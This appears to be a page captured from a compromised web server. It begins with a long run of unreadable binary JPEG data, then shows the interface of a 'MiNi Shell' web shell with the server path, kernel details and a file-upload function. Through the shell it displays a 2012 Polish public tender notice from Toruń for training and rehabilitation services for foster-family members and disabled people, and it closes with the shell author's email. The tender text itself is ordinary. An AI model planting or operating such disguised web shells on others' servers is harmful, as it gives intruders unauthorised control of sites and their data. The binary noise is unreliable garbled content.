JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120508/145290-N-2012.html

<p class="kh_header"><b>Toruń: Zorganizowanie i  przeprowadzenie zajęć szkoleniowych,   warsztatowych oraz turnusu rehabilitacyjnego dla  uczestników realizowanego w okresie od 2012r do 2013r. Projektu systemowego pt Uwierzyć w siebie - aktywna integracja osób przebywających w rodzinach zastępczych i je opuszczających realizowanym zgodnie z Europejskim Funduszem Społecznym Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie  7.1 Poddziałanie 7.1.2</b><br>
<b>Numer ogłoszenia: 145290 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Towarowa 4-6, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6628750, faks 56 6628751.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i  przeprowadzenie zajęć szkoleniowych,   warsztatowych oraz turnusu rehabilitacyjnego dla  uczestników realizowanego w okresie od 2012r do 2013r. Projektu systemowego pt Uwierzyć w siebie - aktywna integracja osób przebywających w rodzinach zastępczych i je opuszczających realizowanym zgodnie z Europejskim Funduszem Społecznym Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie  7.1 Poddziałanie 7.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i  przeprowadzenie zajęć szkoleniowych,   warsztatowych oraz turnusu rehabilitacyjnego. 
Uczestnikami Projektu jest - w roku 2012 - 47 osób; w roku 2013 - 53 osób, w tym osoby niepełnosprawne . 
Projekt realizowany będzie w latach 2012-2013.
Projekt obejmie  w 2012r. - 47 osób zagrożonych wykluczeniem społecznym 
Projekt będzie realizowany dla:
- 29 osób niepełnosprawnych 
- 10 osób z rodzin zastępczych 
- 8 osób niepełnosprawnych 
W 2013r. zostanie objęta grupa  53 osób zagrożonych wykluczeniem społecznym 
Projekt będzie realizowany dla:
- 30 osób niepełnosprawnych 
- 15 osób z rodzin zastępczych 
- 8 osób - rodziny zastępcze 
Łącznie: Projekt jest skierowany w okresie 2012/2013 do 100 osób
DZIAŁANIA W RAMACH AKTYWNEJ INTEGRACJI W 2012 I 2013 R.
2012 r. i 2013 r.
I. Działania w   ramach Aktywnej Integracji dla 29 osób niepełnosprawnych w 2012 r. i dla 30 osób niepełnosprawnych w 2013 r.  
Planuje się zastosowanie 4 instrumentów aktywnej integracji w 2012 i 2013 r.: 
1)	Instrumenty Aktywizacji Zawodowej - 2012r. -  58 godz., 2013r. - 58 godz.; 
łącznie  116 godz. w tym:
a)	 Indywidualne doradztwo zawodowe - konsultacje indywidualne:
-przeprowadzenie ankiet samooceny
-ocena predyspozycji zawodowych
-ocena słabych/mocnych stron/motywacji
2)	Instrumenty Aktywizacji Społecznej - 2012r. - 75 godz., 2013r. - 75 godz.; łącznie  150 godz., Warsztaty  odbywają się  w 2 grupach, w tym:
a)	Warsztaty integracji i kompetencji społecznych; 
- zajęcia dot. integracji grupowej
- wzmocnienie umiejętności społeczno-zawodowych
- wsparcie psychologiczne
- I grupa - 14 godz. 
- II grupa - 14 godz.
-  łącznie - 28 godz.
b)	Warsztaty motywacyjno-wzmacniające;  
- podniesienie motywacji do założenia spółdzielni socjalnej
- spotkanie z przedstawicielami funkcjonujących lokalnie podmiotów ekonomii społecznej z terenu województwa kujawsko-pomorskiego
- I grupa - 7 godz. 
- II grupa - 7 godz.
- łącznie 14 godz.
c)	Zajęcia dla osób zaangażowanych w utworzenie spółdzielni socjalnej - grupy samopomocowej 
- łącznie - 12 godz.; 
d)	Poradnictwo specjalistyczne  I - sesje dla grupy zaangażowanej w utworzenie spółdzielni socjalnej:
- łącznie 14 godz.
e)	Poradnictwo specjalistyczne II - warsztaty dla grupy zaangażowanej w utworzenie spółdzielni socjalnej:
- łącznie 7 godz.
3)	Instrumenty Aktywizacji Edukacyjnej - 2012r. -  432 godz.; 2013r. - 432 godz.; łącznie  864 godz., Warsztaty w ppkt a) i b)  odbywają się w 2 grupach:
a)	Szkolenie wstępne z zakresu  ekonomii społecznej w Polsce: dwie grupy:
- łącznie - 14 godz.
b)      Warsztaty z zakresu spółdzielni socjalnej; dwie grupy
- procedury założenia i prowadzenia spółdzielni socjalnej
- zagadnienia marketingu, księgowości, elementy prawne
- łącznie 84 godz.
c) Warsztaty konstrukcji wniosków o pozyskanie dotacji na utworzenie spółdzielni socjalnej z PUP 
- łącznie 14 godz.
d)	4 Szkolenia zawodowe do wyboru; szkolenia w 4 grupach:
- 4 szkolenia x 80 godz.
- łącznie 320 godz.
d)    - 1- dniowy wyjazd studyjny do spółdzielni socjalnej w na terenie województwa kujawsko-pomorskiego - cała grupa
e)    - 2 - dniowy wyjazd studyjny w ramach dobrych praktyk - wizytacje m.inn. pięć podmiotów ekonomii społecznej oraz Fundacji  - cała grupa, nocleg i wyżywienie
     4)       Instrumenty Aktywizacji Zdrowotnej
a)  Organizacja wyjazdu na stacjonarny turnus rehabilitacyjny:  w 2012r. dla 28 osób niepełnosprawnych, w 2013r. dla 29 osób niepełnosprawnych
-  czas trwania turnusu: 14 dni pobytowych - teren nadmorski; 
2012 r.:
 Suma godzin w I Działaniu -  Ścieżka metodyczna dot. ekonomii społecznej
- łącznie z zajęciami indywidualnymi -  565 godz.
- w zajęciach indywidualnych - ok. 2 godz. na osobę
2013 r.:
 Suma godzin w I Działaniu - Ścieżka metodyczna dot. ekonomii społecznej
- łącznie z zajęciami indywidualnymi -  565 godz.
- w zajęciach indywidualnych -  ok. 2 godz. na osobę
II. Działania w  ramach Aktywnej Integracji dla 10 osób z rodzin zastępczych w 2012 r. i dla 15 osób z rodzin zastępczych w 2013 r.  
W 2013 r. zostaną zastosowane takie same jak w 2012 r. instrumenty aktywnej integracji.
Zastosowanie  4 instrumentów aktywnej integracji: 
1)	Instrumenty Aktywizacji Społecznej- 2012r. - 14 godz., 2013r. - 14 godz.; łącznie  28 godz., w tym:
a)	Warsztaty  kompetencji społecznych i autoprezentacji; cała grupa
- łącznie 7 godz.
b)  Wizaż i autoprezentacja; cała grupa
- łącznie 7 godz.
2)	Instrumenty Aktywizacji Zawodowej 2012r. - 27  godz., 2013r. - 27 godz.; łącznie  54 godz., w tym:
a)	Warsztaty z doradcą zawodowym; cała grupa
- łącznie 7 godz.
b)	 Indywidualne doradztwo zawodowe - konsultacje indywidualne; 
-  łącznie 20 godz.
3)	Instrumenty Aktywizacji Zdrowotnej 2012r. - 27  godz., 2013r. -  27 godz.; łącznie  54 godz., w tym:
a) Terapia psychospołeczna; cała grupa
- łącznie 7 godz.
b)   Indywidualne konsultacje z psychologiem:
-  łącznie 20 godz.
4)    Instrumenty Aktywizacji Edukacyjnej 2012r. - 221  godz., 2013r. - 221 godz.; łącznie  442  godz., w tym:
a)	Szkolenia Internet i e-praca.; cała grupa
- łącznie 7 godz.
b)	Zajęcia ABC biznesu; cała grupa
- łącznie 14 godz.
c)	Zajęcia język angielski.; cała grupa:
- łącznie 40 godz.
d)	Szkolenia zawodowe do wyboru - 2 grupy:
- I grupa: Pakiet IT: (program komputerowy), 
- II grupa: Pakiet hotelarsko-gastronomiczny 
- 2 szkolenia x 80 godz.
- łącznie 160 godz.
2012 r.
 Suma godzin w II Działaniu 
- łącznie z zajęciami indywidualnymi -  289 godz.
- w zajęciach indywidualnych - ok. 2 godz. na osobę
2013 r.
 Suma godzin w II Działaniu
- łącznie z zajęciami indywidualnymi -  289 godz.
- w zajęciach indywidualnych - ok. 2 godz. na osobę
III. Działania w   ramach Aktywnej Integracji dla 8 osób niepełnosprawnych  w 2012 r. 
Zastosowanie  4 instrumentów aktywnej integracji: 
1)	Instrumenty Aktywizacji Społecznej 2012r. - 7 godz., 2013r. - 0 godz.; łącznie  7  godz., w tym:
a)	Warsztaty kompetencji społecznych - cała grupa :
- łącznie 7 godz.
2) Instrumenty Aktywizacji Zawodowej 2012r. - 23 godz., 2013r. - 0 godz.; łącznie   23  godz., w tym:
 a) Warsztaty z doradcą zawodowym - grupowe.; 
	- łącznie 7 godz.
b)  Indywidualne doradztwo zawodowe  - konsultacje indywidualne; 
-  łącznie 16 godz.
3) Instrumenty Aktywizacji Edukacyjnej 2012r. - 98  godz., 2013r. - 0 godz.; łącznie   98  godz., w tym:
a) Szkolenie ogólne przygotowujące do prac w obszarze administracji
- 2 dniowe zajęcia grupowe -
-  łącznie 14 godz.
b)	2 Szkolenia zawodowe specjalistyczne do wyboru:
 Szkolenie I  dla asystentów kobiet niepełnosprawnych; zajęcia w 2 grupach; 
- 6 dni x 7 godz. = łącznie 42 godz.
Szkolenie II - pakiet kompetencji sprzedażowych 
- 6 dni x 7 godz.= łącznie 42 godz.
Łącznie  84 godz.
4.  Instrumenty Aktywizacji Zdrowotnej 2012r. - 30  godz., 2013r. - 0 godz.; łącznie    30  godz., w tym:
a)	Wsparcie terapeutyczne - warsztaty grupowe 
- łącznie  7 godz.
b) Wsparcie psychologiczne - warsztaty grupowe
- łącznie 7 godz.
c)  Indywidualne konsultacje  psychologiczne
- łącznie 16 godz.
d) Organizacja turnusu rehabilitacyjnego 14 dniowego dla 8 osób niepełnosprawnych 
- teren nadmorski 
2012 r.
 Suma godzin w III Działaniu -  Program korekcyjno-edukacyjny
- łącznie z zajęciami indywidualnymi -  158 godz.
- w zajęciach indywidualnych - ok.  2 godz. na osobę
IV. Działania w   ramach Aktywnej Integracji dla 8 osób - rodziny zastępcze w 2013 r. 
Zastosowanie  4 instrumentów aktywnej integracji: 
1)	Instrumenty Aktywizacji Społecznej 2012r. - 0  godz., 2013r. - 47 godz.; łącznie   47  godz., w tym:
a)	Warsztaty komunikacji i asertywności - cała grupa
- łącznie 7 godz.
b)	Poradnictwo specjalistyczne - cała grupa
- łącznie 28 godz.  
c)	Zajęcia - Organizacja grupy samopomocowej - cała grupa
- łącznie 12 godz.
2)	Instrumenty Aktywizacji Zdrowotnej 2012r. - 0  godz., 2013r. - 14 godz.; łącznie   14  godz., w tym:
a)	Terapia rodzinna i psychospołeczna - cała grupa;
- łącznie 7 godz.
b) Przemoc i uzależnienia - cała grupa
- łącznie  7 godz.
3)	Instrumenty Aktywizacji Edukacyjnej 2012r. - 0  godz., 2013r. - 21 godz.; łącznie   21  godz., w tym:
a) Kurs  zarządzania zasobami internetowymi
- łącznie 21 godz.
4)	Instrumenty Aktywizacji Zawodowej 2012r. - 0  godz., 2013r. - 8 godz.; łącznie   8  godz., w tym:
a)	 Indywidualne doradztwo zawodowe  
-  łącznie 8 godz.
2013 r.  
 Suma godzin w IV Działaniu
- łącznie z zajęciami indywidualnymi -  90 godz.
- w zajęciach indywidualnych - ok. 1 godz. na osobę
DZIAŁANIA O CHARAKTERZE ŚRODOWISKOWYM  W 2012 I 2013 R.
2012 R. I 2013 R.
I.	 Działania o charakterze środowiskowym dla 10 osób z rodzin zastępczych -  w 2012 r. i dla 15 osób z rodzin zastępczych w 2013 r.
1)	 Wyjazd  integracyjny połączony z zajęciami dydaktycznymi  - 2 dni x 7 godz. Realizacja w ośrodku wypoczynkowym na terenie województwa kujawsko-pomorskiego, 
- 2012 r. - 14 godz.
- 2013 r. - 14 godz.
- łącznie - 28 godz.
2012 R. I 2013 R.
II.	 2012 r. - Działania o charakterze środowiskowym dla  uczestników projektu: w 2012 r. w liczbie 47 i 13 zaproszonych gości;   2013 r. - w liczbie 100 i 10 zaproszonych gości
1)	Konferencja podsumowująca projekt w 2012r. i w 2013 r. na terenie Torunia, 
2013 R.
III.	Działania o charakterze środowiskowym zorganizowane dla rodziców zastępczych.
1)	Kampania informacyjna dla rodziców zastępczych ( 8 osób ) i osób z otoczenia. Łącznie dla ok. 35 osób na terenie Torunia.
Łącznie - 5 godz.
2013 R.
IV.	Działania o charakterze środowiskowym zorganizowane dla rodziców zastępczych. 
1)	 Kampanii informacyjna - konferencja  -  8 osób  i osoby  z otoczenia. Łącznie dla ok. 40 osób, na terenie Torunia.  
Łącznie .- 5 godz.
Działania w ramach aktywnej integracji będą odbywały się na terenie Miasta Chełmża.
Szczegółowy zakres świadczonych usług objętych przedmiotem zamówienia określa Załącznik Nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
zamawiający uzna warunek za spełniony o ile wykonawca przedstawi oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez właściwy miejscowo Wojewódzki Urząd Pracy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia spełniania tego warunku wykonawcy muszą: 
1) wykazać doświadczenie w realizacji zamówień związanych z realizacją warsztatów i/lub kursów i/lub szkoleń na rzecz osób zagrożonych wykluczeniem społecznym, tj.: powinni wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwa) zamówienia związane z realizacją warsztatów i/lub kursów i/lub szkoleń na rzecz osób zagrożonych wykluczeniem społecznym o wartości nie mniejszej niż 150.000 zł brutto (sto pięćdziesiąt tysięcy złotych ) każde, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia spełniania tego warunku wykonawcy muszą: 
     -  wykazać, że dysponują urządzeniami niezbędnymi do realizacji zamówienia, w tym w szczególności: 
	1  rzutnik multimedialny
	20 sztuk laptopów lub komputerów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać, że będą dysponować osobami bezpośrednio uczestniczącymi w realizacji zamówienia posiadającymi kwalifikacje zawodowe, wykształcenie i doświadczenie zawodowe niezbędne do wykonania zamówienia: 
	- trener pracy lub doradca zawodowy
	- psycholog
	- coach - osobisty trener
	- pielęgniarka
	- lekarz specjalista wg.potrzeb
	- lektor języka angielskiego
	- informatyk
	- prawnik
	- terapeuta
	- socjoterapeuta
	- pedagog</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz OFERTA (Zał. nr 2 do SIWZ)
Oświadczenie o spełnianiu warunków złożone na podstawie art. 22 ust. 1 ustawy Pzp (Zał. nr 4 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiattorunski.pl/7262,zamowienia-publiczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Towarowa 4-6 87-100 Toruń
Sekretariat pokój nr 51 - nieodpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2012 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. Towarowa 4-6 87-100 Toruń
Sekretariat pokój nr 51.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pt Uwierzyć w siebie - aktywna integracja osób przebywających w rodzinach zastępczych i je opuszczających realizowany zgodnie z Europejskim Funduszem Społecznym Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie  7.1 Poddziałanie 7.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com